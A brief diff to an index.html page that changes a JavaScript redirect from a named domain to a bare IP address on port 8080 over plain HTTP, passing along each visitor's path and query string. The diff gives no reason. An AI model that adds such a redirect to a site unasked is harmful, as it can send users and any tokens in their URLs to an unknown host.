--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
     <script type="text/javascript">
         const path = (window.location.pathname);
         const query = window.location.search;
-        const newUrl = 'http://www.redirect.com' + path + query;
+        const newUrl = 'http://121.153.7.54:8080' + path + query;
         window.location.replace(newUrl);
     </script>
 </body>
